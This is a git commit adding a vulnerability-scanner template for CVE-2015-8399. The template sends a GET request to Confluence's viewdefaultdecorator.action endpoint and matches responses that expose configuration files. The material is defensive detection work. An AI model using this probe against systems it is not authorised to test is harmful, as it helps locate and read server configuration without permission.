Merge pull request #1215 from projectdiscovery/princechaddha-patch-3

Create CVE-2015-8399.yaml
patch-1
Prince Chaddha 2021-04-21 23:57:24 +05:30 committed by GitHub
commit ced9938646
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: CVE-2015-8399
info:
author: princechaddha
name: Atlassian Confluence configuration files read
severity: medium
description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.
reference: https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro
tags: cve,cve2015,atlassian,confluence
requests:
- method: GET
path:
- "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "confluence-init.properties"
- "View Default Decorator"
condition: and
part: body